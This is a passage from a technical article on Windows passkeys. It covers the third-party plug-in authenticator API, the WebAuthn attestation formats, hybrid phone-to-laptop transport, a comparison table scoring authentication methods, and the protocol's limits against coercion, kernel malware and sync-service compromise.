&lt;p&gt;The plug-in model is the first OS-level passkey-provider API on a major desktop platform. macOS Sonoma and iOS 17 had shipped a parallel design (&lt;code&gt;ASCredentialIdentityStore&lt;/code&gt; plus &lt;code&gt;ASCredentialProviderExtension&lt;/code&gt;) [@apple-ascredentialprovider]; Android 14 had added Credential Manager support [@android-credman]; Windows 11 24H2 is the desktop OS that matches the mobile platforms. The mechanism is a COM interface called &lt;code&gt;IPluginAuthenticator&lt;/code&gt;, declared in &lt;code&gt;pluginauthenticator.idl&lt;/code&gt; [@github-ms-webauthn]. A passkey-manager vendor ships a packaged Windows app that registers a COM object implementing the interface, supplies an AAGUID and a friendly name, and lets the OS dispatch ceremonies to it.&lt;/p&gt;
&lt;p&gt;The Plugin API surface is six functions on the OS side and one COM interface on the vendor side. From &lt;code&gt;webauthnplugin.h&lt;/code&gt; and the Microsoft Learn reference [@ms-learn-webauthn-apis]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNPluginAddAuthenticator&lt;/code&gt;&lt;/strong&gt; -- register the plug-in with the OS. The vendor app calls this on first run.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNPluginAuthenticatorAddCredentials&lt;/code&gt;&lt;/strong&gt; -- supply the OS with the credentials the plug-in currently has, so the OS can render them in pickers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNPluginAuthenticatorRemoveCredentials&lt;/code&gt;&lt;/strong&gt; -- the inverse; remove credentials the plug-in no longer holds.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNPluginPerformUserVerification&lt;/code&gt;&lt;/strong&gt; -- request Windows Hello UV on behalf of the plug-in. The plug-in does &lt;em&gt;not&lt;/em&gt; take the UV gesture itself; Windows Hello does, so the gesture-to-credential trust path is OS-mediated.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNPluginRemoveAuthenticator&lt;/code&gt;&lt;/strong&gt; -- the vendor&apos;s uninstall path.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WebAuthNPluginGetAuthenticatorState&lt;/code&gt;&lt;/strong&gt; -- query the Enabled/Disabled state of a registered plug-in authenticator by its COM CLSID.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Three additional &lt;code&gt;EXPERIMENTAL_*2&lt;/code&gt; functions ship in Insider build KB5072046 and refine the registration, UV, and update flows. The list, verbatim from the &lt;code&gt;github.com/microsoft/webauthn&lt;/code&gt; README: &lt;code&gt;EXPERIMENTAL_WebAuthNPluginAddAuthenticator2&lt;/code&gt;, &lt;code&gt;EXPERIMENTAL_WebAuthNPluginPerformUserVerification2&lt;/code&gt;, &lt;code&gt;EXPERIMENTAL_WebAuthNPluginUpdateAuthenticatorDetails2&lt;/code&gt; [@github-ms-webauthn].&lt;/p&gt;
&lt;p&gt;The Microsoft-authored reference implementation is the Contoso Passkey Manager sample in &lt;code&gt;microsoft/Windows-classic-samples&lt;/code&gt; [@github-ms-passkey-sample]. The sample&apos;s build manifest is explicit: &quot;Windows SDK version 10.0.26100.7175 or higher. Operating system requirements: Windows 11 version 25H2. Build Major Version = 26200 and Minor Version &amp;gt;= 6725. Windows 11 version 24H2. Build Major Version = 26100 and Minor Version &amp;gt;= 6725&quot; [@github-ms-passkey-sample]. The Microsoft Learn tutorial &lt;em&gt;Third-party passkey providers on Windows&lt;/em&gt; walks the same sample step by step [@ms-learn-thirdparty].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Microsoft Learn third-party tutorial carries an explicit disclaimer: &quot;Contoso Passkey Manager is designed for passkey creation and usage testing only. Don&apos;t use the app for production passkeys&quot; [@ms-learn-thirdparty]. The sample illustrates the COM contract; it does not replace a vetted vendor&apos;s credential vault.&lt;/p&gt;
&lt;/blockquote&gt;

flowchart TD
    A[Browser or native app] --&amp;gt; B[webauthn.dll]
    B --&amp;gt; C{&quot;Provider picker&quot;}
    C --&amp;gt;|Windows Hello / platform| D[CNG + TPM 2.0]
    C --&amp;gt;|Roaming hardware| E[USB-HID / NFC / BLE]
    C --&amp;gt;|Third-party plug-in| F[COM: IPluginAuthenticator]
    F --&amp;gt; G[1Password / Bitwarden / Dashlane vault]
    F --&amp;gt; H[WebAuthNPluginPerformUserVerification]
    H --&amp;gt; I[Windows Hello UI]
    I --&amp;gt; H
    G --&amp;gt; F
    F --&amp;gt; B
    B --&amp;gt; A
&lt;p&gt;The user-facing flow follows the same logic as the macOS / iOS / Android equivalents. The user installs 1Password or Bitwarden from the Microsoft Store. The vendor app calls &lt;code&gt;WebAuthNPluginAddAuthenticator&lt;/code&gt; on first launch. The user enables the provider in Settings -&amp;gt; Accounts -&amp;gt; Passkeys -&amp;gt; Advanced options [@ms-windev-passkeys-blog]. From that point on, when any browser or native app on Windows starts a WebAuthn ceremony, &lt;code&gt;webauthn.dll&lt;/code&gt; presents the user with a picker -- &quot;use a passkey from Windows Hello, from 1Password, from Bitwarden, from a hardware security key, or from your phone&quot; -- and routes the ceremony to the selected provider. The plug-in itself returns an attestation object and an assertion; Windows Hello handles user verification on the plug-in&apos;s behalf via &lt;code&gt;WebAuthNPluginPerformUserVerification&lt;/code&gt;. The Windows trust boundary still owns the gesture acquisition.&lt;/p&gt;

The plug-in model adds credential-store choice; it does not change the lock-screen credential. The plug-in cannot replace Windows Hello at the lock screen; lock-screen sign-in remains the platform authenticator. The plug-in cannot proxy domain credentials -- Kerberos and NTLM are unaffected. The plug-in is *not* a replacement for the legacy `CredMan` (Credential Manager) generic-credential surface; that surface is still where Windows applications stash Basic-Auth-style credentials. The plug-in model is, specifically, a WebAuthn credential store. Everything else stays where it was.
&lt;p&gt;The criterion-table consequence is mixed. The plug-in model strengthens &lt;em&gt;user choice&lt;/em&gt; and &lt;em&gt;recovery&lt;/em&gt;, because a user with an existing 1Password / Bitwarden vault can reuse the recovery primitives they already know. It weakens &lt;em&gt;verifier-compromise resistance&lt;/em&gt; relative to a pure platform-bound passkey, because the long-term key now lives in the vendor&apos;s vault rather than the TPM -- and the vendor&apos;s vault becomes another point of compromise. It does not change phishing resistance, replay resistance, or step-up, because those are properties of the WebAuthn ceremony and the plug-in still produces a WebAuthn-shaped assertion.&lt;/p&gt;
&lt;p&gt;What 1Password, Bitwarden, and Dashlane each ship in their plug-in implementations follows the same template: registration requests get either a &lt;code&gt;packed&lt;/code&gt; attestation statement (for vendor-signed batch attestation keys) or a &lt;code&gt;none&lt;/code&gt; attestation (most consumer flows), and authentication assertions come back the same shape as any other WebAuthn assertion. The plug-in itself decides whether the credential is &lt;code&gt;BE=1, BS=1&lt;/code&gt; (synced in the vendor&apos;s cloud) or &lt;code&gt;BE=0, BS=0&lt;/code&gt; (device-bound to the local install).&lt;/p&gt;
&lt;p&gt;A plug-in supplies the credential. But the &lt;em&gt;attestation statement&lt;/em&gt; on registration tells the relying party &lt;em&gt;what kind of credential it is&lt;/em&gt;. That&apos;s a separate API surface -- what shapes does it come in?&lt;/p&gt;
&lt;h2&gt;11. The seven attestation conveyance formats&lt;/h2&gt;
&lt;p&gt;The IANA WebAuthn registry lists seven format identifiers for the &lt;em&gt;attestation statement&lt;/em&gt; a registration ceremony can produce [@iana-webauthn-registry]. The registry is reachable via RFC 8809 (Hodges, Mandyam, M.B. Jones, August 2020) [@rfc8809] and the canonical normative definitions are in WebAuthn Level 2 §§8.2-8.8 [@webauthn-l2-latest], whose dated Recommendation is at &lt;code&gt;REC-webauthn-2-20210408&lt;/code&gt; [@webauthn-l2-rec]. The seven, in registry order: &lt;code&gt;packed&lt;/code&gt;, &lt;code&gt;tpm&lt;/code&gt;, &lt;code&gt;android-key&lt;/code&gt;, &lt;code&gt;android-safetynet&lt;/code&gt;, &lt;code&gt;fido-u2f&lt;/code&gt;, &lt;code&gt;apple&lt;/code&gt;, and &lt;code&gt;none&lt;/code&gt;. Each is one option a relying party can require, accept, or ignore.&lt;/p&gt;

The mechanism by which a WebAuthn registration ceremony optionally produces a signature over the new credential&apos;s public key (and `authenticatorData` containing the `rpIdHash`), chained to a vendor or platform root. The relying party validates the chain to establish that the new credential&apos;s private key is held by a specific authenticator model or certification level. Attestation is distinct from authentication; attestation runs once at registration, authentication runs every sign-in. The WebAuthn `attestation` parameter on registration controls whether the RP asks for an attestation statement at all (values: `none`, `indirect`, `direct`, `enterprise`).
&lt;p&gt;The table below summarises what each format teaches the relying party.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Format&lt;/th&gt;
&lt;th&gt;What the RP verifies&lt;/th&gt;
&lt;th&gt;Trust anchor required&lt;/th&gt;
&lt;th&gt;Criterion strengthened&lt;/th&gt;
&lt;th&gt;Current adoption&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;packed&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Signature over &lt;code&gt;authenticatorData || clientDataHash&lt;/code&gt; by batch attestation key or self-attestation key&lt;/td&gt;
&lt;td&gt;Vendor X.509 cert chain or none (self)&lt;/td&gt;
&lt;td&gt;Verifier-compromise (model identity), optional anti-fraud&lt;/td&gt;
&lt;td&gt;Default for most CTAP2 keys; dominant in production&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;tpm&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;TPM 2.0 &lt;code&gt;TPM2_Certify&lt;/code&gt;-style quote over the new credential public key&lt;/td&gt;
&lt;td&gt;AIK / EK chain to TPM vendor root&lt;/td&gt;
&lt;td&gt;Verifier-compromise + device-bound storage&lt;/td&gt;
&lt;td&gt;Windows platform-bound passkeys&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;android-key&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Android Keystore attestation chain&lt;/td&gt;
&lt;td&gt;Google-rooted hardware-attestation CA&lt;/td&gt;
&lt;td&gt;Verifier-compromise + StrongBox / TEE residency&lt;/td&gt;
&lt;td&gt;Android platform passkeys&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;android-safetynet&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;SafetyNet API-derived attestation token&lt;/td&gt;
&lt;td&gt;Google SafetyNet CA&lt;/td&gt;
&lt;td&gt;Legacy; declining&lt;/td&gt;
&lt;td&gt;Legacy Android; SafetyNet deprecation announced June 2022; migration deadline end of January 2024; complete shutdown end of January 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;fido-u2f&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;ECDSA P-256 signature with vendor X.509 cert&lt;/td&gt;
&lt;td&gt;Vendor U2F-era cert&lt;/td&gt;
&lt;td&gt;Verifier-compromise (legacy)&lt;/td&gt;
&lt;td&gt;Legacy U2F-era hardware keys; declining&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;apple&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Anonymous Apple-issued attestation chain&lt;/td&gt;
&lt;td&gt;Apple anonymous-attestation CA&lt;/td&gt;
&lt;td&gt;Verifier-compromise without device de-anonymisation&lt;/td&gt;
&lt;td&gt;Apple platform passkeys&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;none&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;No attestation; credential public key plus AAGUID only&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;The default for synced-passkey consumer flows&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;A few of these deserve a paragraph each.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;packed&lt;/code&gt;&lt;/strong&gt; is the spec default and the most widely deployed. The authenticator emits one signature over the concatenation of &lt;code&gt;authenticatorData&lt;/code&gt; and a hash of &lt;code&gt;clientDataJSON&lt;/code&gt;, using one of three keys: (a) a per-authenticator-model &lt;em&gt;batch attestation key&lt;/em&gt; whose X.509 chain anchors to the vendor&apos;s attestation root (the privacy-vs-anti-fraud trade-off -- the cert reveals the device model, but not which specific user owns which device); (b) an &lt;em&gt;Anonymisation CA&lt;/em&gt; or Enterprise Attestation key, which lets a managed enterprise distinguish its own devices without leaking that information to consumer relying parties; or (c) a &lt;em&gt;self-attestation&lt;/em&gt; key derived from the credential itself, which proves only that the private key signs and makes no identity claim.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;tpm&lt;/code&gt;&lt;/strong&gt; is the format the Windows platform authenticator emits when the user has a TPM 2.0. The signing object is a TPM &lt;code&gt;TPM2_Quote&lt;/code&gt;-style structure with the TPM&apos;s Attestation Identity Key (AIK), chained back to the TPM vendor&apos;s Endorsement Key (EK) root certificate. This is the most cryptographically opinionated attestation in the registry: it proves the credential is held by a specific TPM vendor&apos;s part. The Windows TPM article in this series walks the AIK / EK chain end to end.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;apple&lt;/code&gt;&lt;/strong&gt; is Apple&apos;s anonymous-attestation design. The X.509 chain ends in an Apple anonymous-attestation CA; cryptographically the relying party can verify the cert chain back to Apple&apos;s root, but the cert itself is engineered to not reveal the user&apos;s specific device. This is the privacy-vs-anti-fraud trade-off resolved in favour of privacy: a relying party gets &quot;this came from a real Apple device&quot; without learning &lt;em&gt;which&lt;/em&gt; Apple device.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;android-safetynet&lt;/code&gt;&lt;/strong&gt; is the legacy format that lots of installed-base Android passkeys still use. Google announced the SafetyNet Attestation API&apos;s deprecation in June 2022 in favour of Play Integrity; the migration deadline was extended to end of January 2024, with complete shutdown landing end of January 2025 [@android-safetynet-deprecation]. Any new Android passkey registered in 2025 or later uses &lt;code&gt;android-key&lt;/code&gt; or &lt;code&gt;none&lt;/code&gt; instead. Relying parties with old &lt;code&gt;android-safetynet&lt;/code&gt; credentials in their database must accept both formats during the transition window; new credentials use the new path.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;fido-u2f&lt;/code&gt;&lt;/strong&gt; is the U2F-era legacy format, descended directly from the December 2014 U2F design [@fido-u2f-overview]. ECDSA P-256 signing key plus a vendor X.509 cert. Modern keys still emit it for U2F-mode CTAP1 ceremonies, but every modern CTAP2 ceremony uses &lt;code&gt;packed&lt;/code&gt; instead.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;none&lt;/code&gt;&lt;/strong&gt; is the most-deployed format in &lt;em&gt;consumer&lt;/em&gt; flows -- and the recommended default for any relying party that does not have a specific anti-fraud requirement. The RP asks for &lt;code&gt;attestation: &quot;none&quot;&lt;/code&gt;; the authenticator returns just the credential public key and the AAGUID, with no signature chain. The privacy benefit is real: attestation deanonymises the user&apos;s device by model, and a relying party that does not need that information should not collect it. The 2024-2026 best practice is &lt;code&gt;attestation: &quot;none&quot;&lt;/code&gt; for consumer passkey flows. NIST SP 800-63B-4 (final) inherits this caution [@sp80063b4-html].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Use &lt;code&gt;attestation: &quot;none&quot;&lt;/code&gt; for consumer flows; the privacy cost of &lt;code&gt;direct&lt;/code&gt; outweighs the anti-fraud benefit for low-value accounts. Use &lt;code&gt;attestation: &quot;direct&quot;&lt;/code&gt; only when (a) you have a documented anti-fraud requirement, (b) you can verify the chain against the FIDO Metadata Service, and (c) you accept that the cert reveals the authenticator model. Use &lt;code&gt;attestation: &quot;enterprise&quot;&lt;/code&gt; only inside a managed enterprise where the user&apos;s device is corporately enrolled.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The discussion so far assumed the authenticator is &lt;em&gt;on the same device&lt;/em&gt; as the browser (the attestation formats themselves are transport-independent: platform, roaming USB/NFC/BLE, and hybrid phone authenticators can all return these objects). What happens when the authenticator is a phone across the room?&lt;/p&gt;
&lt;h2&gt;12. Hybrid transport: a phone authenticator for a laptop browser&lt;/h2&gt;
&lt;p&gt;A user on a borrowed Windows laptop with no Windows passkey signs in to their bank by scanning a QR code with their iPhone. The phone is the authenticator. The laptop is the WebAuthn client. The protocol that ties them together is &lt;em&gt;hybrid transport&lt;/em&gt;, formerly known as caBLE (Cloud-Assisted Bluetooth Low Energy), standardised in W3C WebAuthn Level 3 §6.3.3 [@webauthn-l3-cr].&lt;/p&gt;

A WebAuthn transport in which a roaming authenticator (typically a mobile phone) cooperates with a WebAuthn client on a nearby device (typically a laptop) via three concurrent channels: an out-of-band channel (QR code) for one-time setup, BLE for proximity, and HTTPS to a discoverable cloud tunnel relay for the actual ceremony bytes. The cryptographic binding is an ephemeral ECDH key exchanged through the QR code; the BLE proves proximity, not identity; the tunnel relay carries the encrypted ceremony [@webauthn-l3-cr-dated].
&lt;p&gt;The ceremony, simplified: the laptop&apos;s browser asks the user to use a phone, generates an ephemeral ECDH keypair, and renders a QR code containing the Tunnel Service URL the phone should connect to, the laptop&apos;s ephemeral public key, and a derived HMAC key. The phone&apos;s camera scans the QR code and derives a shared secret with the laptop via ECDH. The phone then advertises its presence over BLE, the laptop listens for the BLE beacon to confirm physical proximity, and both endpoints connect to the Tunnel Service URL over HTTPS. From that point on, the laptop and the phone exchange CTAP2 ceremony messages, encrypted under the ECDH-derived key, through the tunnel relay. The phone produces a WebAuthn assertion locally using whatever authenticator is on the phone (the Secure Enclave on iPhone, the Android Keystore on Android), encrypts it for the laptop, and the laptop forwards it to the relying party.&lt;/p&gt;

sequenceDiagram
    participant U as User
    participant L as Laptop browser
    participant P as Phone authenticator
    participant T as Tunnel Service
    participant R as Relying Party
    L-&amp;gt;&amp;gt;R: navigator.credentials.get
    R-&amp;gt;&amp;gt;L: PublicKeyCredentialRequestOptions
    L-&amp;gt;&amp;gt;L: generate ephemeral ECDH keypair
    L-&amp;gt;&amp;gt;U: display QR code (tunnel URL, ephem pubkey, HMAC seed)
    U-&amp;gt;&amp;gt;P: scan QR code
    P-&amp;gt;&amp;gt;P: derive shared secret via ECDH
    P-&amp;gt;&amp;gt;L: BLE advertisement (proximity proof)
    L-&amp;gt;&amp;gt;L: confirm BLE advertisement
    P-&amp;gt;&amp;gt;T: HTTPS connect to tunnel URL
    L-&amp;gt;&amp;gt;T: HTTPS connect to tunnel URL
    T-&amp;gt;&amp;gt;L: relay encrypted CTAP2 traffic
    T-&amp;gt;&amp;gt;P: relay encrypted CTAP2 traffic
    P-&amp;gt;&amp;gt;U: prompt for user verification
    U-&amp;gt;&amp;gt;P: present gesture
    P-&amp;gt;&amp;gt;P: produce WebAuthn assertion (origin-bound)
    P-&amp;gt;&amp;gt;T: encrypted assertion
    T-&amp;gt;&amp;gt;L: encrypted assertion
    L-&amp;gt;&amp;gt;R: assertion
    R-&amp;gt;&amp;gt;U: signed in
&lt;p&gt;The criterion-table consequence is precise. Phishing resistance is preserved because the &lt;em&gt;origin&lt;/em&gt; in &lt;code&gt;clientDataJSON&lt;/code&gt; is the laptop&apos;s actual browser origin, which the phone signs over the same way it would for its own browser. The QR code is the cryptographic binding, not the BLE advertisement; the BLE advertisement is a proximity signal that proves the phone is physically near the laptop, but it does not authenticate the phone. The Tunnel Service is a &lt;em&gt;relay&lt;/em&gt;, not a trust anchor; even if the tunnel were compromised, the encrypted ceremony bytes would be unreadable without the ECDH-derived key.&lt;/p&gt;
&lt;p&gt;The design is attributed in the WebAuthn L3 spec to the W3C WebAuthn-3 editor masthead -- Jeff Hodges, J.C. Jones, Michael B. Jones, Akshay Kumar, and Emil Lundberg as current editors, with Dirk Balfanz as a previous editor [@wiki-webauthn]. The original caBLE design and the L3 §6.3.3 productisation were led by Google&apos;s Chrome security and Android Identity teams; the canonical reference is W3C WebAuthn Level 3 §6.3.3 itself.&lt;/p&gt;
&lt;p&gt;Hybrid transport is the only competitor to the Windows platform authenticator that involves no Windows-side credential storage. The Windows laptop holds nothing -- no key, no recovery state, no cached credential. Every ceremony round-trips to the phone. This is the use case the bank-on-a-borrowed-laptop story illustrates: you can sign in to your accounts on a machine you do not own without leaving a credential behind.&lt;/p&gt;
&lt;p&gt;How do other authentication approaches score on the criteria framework?&lt;/p&gt;
&lt;h2&gt;13. Competing approaches scored against the criteria&lt;/h2&gt;
&lt;p&gt;The criteria-framework table makes the competitive field legible. Five rows, six competing columns: password alone, password plus SMS-OTP, password plus TOTP, password plus push with number matching, smart card / PIV, and device-bound or synced passkey. The NIST SP 800-63B-4 AAL grading [@sp80063b4-html] and the NIST syncable-authenticator supplement [@sp80063sup1] anchor the right edge of the table; Yubico&apos;s commentary corroborates the dichotomy between device-bound (AAL3) and synced (AAL2) passkeys [@yubico-nist-guidance].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Criterion&lt;/th&gt;
&lt;th&gt;Password&lt;/th&gt;
&lt;th&gt;Password + SMS-OTP&lt;/th&gt;
&lt;th&gt;Password + TOTP&lt;/th&gt;
&lt;th&gt;Password + Push (number match)&lt;/th&gt;
&lt;th&gt;Smart Card / PIV&lt;/th&gt;
&lt;th&gt;Device-bound passkey&lt;/th&gt;
&lt;th&gt;Synced passkey&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Phishing resistance&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None (AitM relays the OTP)&lt;/td&gt;
&lt;td&gt;None (AitM relays the TOTP)&lt;/td&gt;
&lt;td&gt;Partial (number match defeats most kits)&lt;/td&gt;
&lt;td&gt;Strong (channel-bound via mutual TLS)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Strong&lt;/strong&gt; (&lt;code&gt;rpId&lt;/code&gt; binding)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Strong&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Verifier-compromise resistance&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None (SMS infra leaks)&lt;/td&gt;
&lt;td&gt;Partial (TOTP seed on server)&lt;/td&gt;
&lt;td&gt;Partial&lt;/td&gt;
&lt;td&gt;Strong (public-key only)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Strong&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Strong&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Replay / relay resistance&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Weak (OTP relay in 30-60 s)&lt;/td&gt;
&lt;td&gt;Weak (TOTP relay in 30 s)&lt;/td&gt;
&lt;td&gt;Strong (number match per challenge)&lt;/td&gt;
&lt;td&gt;Strong (per-handshake nonce)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Strong&lt;/strong&gt; (challenge + counter)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Strong&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Step-up / continuity&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Partial&lt;/td&gt;
&lt;td&gt;Strong (PIN re-prompt)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Strong&lt;/strong&gt; (&lt;code&gt;UV=1&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Strong&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Recovery floor&lt;/td&gt;
&lt;td&gt;Reset via SMS&lt;/td&gt;
&lt;td&gt;SMS-OTP all the way down&lt;/td&gt;
&lt;td&gt;TOTP seed reset via SMS&lt;/td&gt;
&lt;td&gt;SMS / password&lt;/td&gt;
&lt;td&gt;Admin re-issue&lt;/td&gt;
&lt;td&gt;RP-dependent backup key&lt;/td&gt;
&lt;td&gt;Sync-fabric recovery (Recovery Key + Recovery Contact)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NIST AAL ceiling&lt;/td&gt;
&lt;td&gt;AAL1&lt;/td&gt;
&lt;td&gt;AAL2 nominal (SMS-OTP RESTRICTED in 800-63-3 [@nist-sp80063-3-final]; remains RESTRICTED with added obligations in 800-63B-4 [@sp80063-4-final])&lt;/td&gt;
&lt;td&gt;AAL2&lt;/td&gt;
&lt;td&gt;AAL2&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;AAL3&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;AAL3&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;AAL2&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Push MFA needs a paragraph of nuance. Vanilla push -- &quot;tap to approve&quot; -- is phishable by default because the attacker can simply trigger the push at the moment they have the password, and a fatigued user taps. Number matching (the user types a code shown on the laptop into the phone, or vice versa) defeats most kits because it ties the push to a specific session. &lt;em&gt;Location binding&lt;/em&gt; (the push is rejected unless the phone is geographically near the laptop) adds another layer. The net is &quot;partial&quot; phishing resistance -- much better than vanilla push, not as strong as origin binding.&lt;/p&gt;
&lt;p&gt;Smart cards and PIV deserve their own paragraph because they are not historically associated with WebAuthn but score well on the criteria. A PIV card with a PIN provides strong phishing resistance via TLS client authentication (channel-bound at the TLS layer), strong verifier-compromise resistance via the public-key model, and strong replay resistance via per-handshake nonces. The weakness is &lt;em&gt;recovery&lt;/em&gt;: a lost card requires an administrative reissue, which scales poorly for consumer flows. The companion &lt;em&gt;App Identity in Windows&lt;/em&gt; article in this series walks the Windows smart-card stack end to end.&lt;/p&gt;
&lt;p&gt;OATH-TOTP is interesting in the criteria table because it is phishing-vulnerable by construction. The TOTP code is the same on the legitimate origin and the look-alike; the AitM kit forwards the code through. Google Authenticator&apos;s cloud-sync feature additionally broke the verifier-compromise property in a subtle way: if the user&apos;s Google account is compromised, the synced TOTP seeds give the attacker a complete second-factor toolkit [@google-auth-sync-2023].&lt;/p&gt;
&lt;p&gt;SAML and OIDC federation are not competitors to WebAuthn in the criteria table -- they are &lt;em&gt;transport layers above&lt;/em&gt; WebAuthn. A SAML or OIDC identity provider does the WebAuthn ceremony for the user; the IdP then issues a SAML assertion or an OIDC ID token to the relying party. WebAuthn underneath is the strong primitive; SAML and OIDC are the enterprise transport for the resulting assertions.&lt;/p&gt;
&lt;p&gt;WebAuthn wins decisively on four of five rows. What&apos;s left in row five? The recovery row.&lt;/p&gt;
&lt;h2&gt;14. Theoretical limits: the corners WebAuthn cannot reach&lt;/h2&gt;
&lt;p&gt;Even with everything from §§4-12 in place, WebAuthn has corners it cannot defend. The relevant impossibility results are well-known in the protocol literature; they are worth naming because they tell a practitioner where defence-in-depth has to come from.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Coerced consent.&lt;/strong&gt; WebAuthn cannot distinguish a willing user from a coerced one. The protocol&apos;s only signal is &quot;the user performed the gesture&quot; -- a fingerprint, a PIN, a face match. No protocol whose only observable is gesture completion can tell whether the user was free at the moment of the gesture. NIST SP 800-63B-4 does not classify physical coercion among the attacks it defends against [@sp80063b4-html]; this is a general impossibility, not a WebAuthn-specific weakness.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A user under duress can be made to present a gesture. WebAuthn cannot detect this. The compensating control is &lt;em&gt;transactional&lt;/em&gt; -- step-up authentication with a fresh challenge for high-value actions, and out-of-band confirmation for transactions above a risk threshold. The protocol cannot solve coercion; the application layer must.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Kernel-level malware on the client.&lt;/strong&gt; Malware with kernel privilege on the user&apos;s device can race the legitimate user. If the malware can call into &lt;code&gt;webauthn.dll&lt;/code&gt; and trigger a Hello UV prompt the user blindly approves, it can extract assertions. The mitigation is TPM-bound keys plus the Hello ESS trustlet (covered in the companion &lt;em&gt;Windows Hello&lt;/em&gt; and &lt;em&gt;Credential Guard&lt;/em&gt; articles), not WebAuthn itself. WebAuthn protects against &lt;em&gt;network&lt;/em&gt; attackers; defending against a kernel-mode attacker on the same device requires the OS&apos;s secure-kernel architecture.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sync-fabric compromise.&lt;/strong&gt; Compromise of Apple iCloud, Google account recovery, or Microsoft&apos;s recovery-key service effectively compromises every passkey held there. Apple&apos;s Advanced Data Protection model [@apple-adp-kb] is the strongest currently-shipped consumer realisation of the end-to-end-encrypted sync invariant, and even it depends on the user retaining their Recovery Contact or Recovery Key in some form. The NIST April 2024 supplement classifies synced passkeys at AAL2 for exactly this reason: the private key leaves the original authenticator [@sp80063sup1]. Yubico&apos;s commentary makes the practitioner consequence explicit: device-bound is AAL3, synced is AAL2 [@yubico-nist-guidance].&lt;/p&gt;
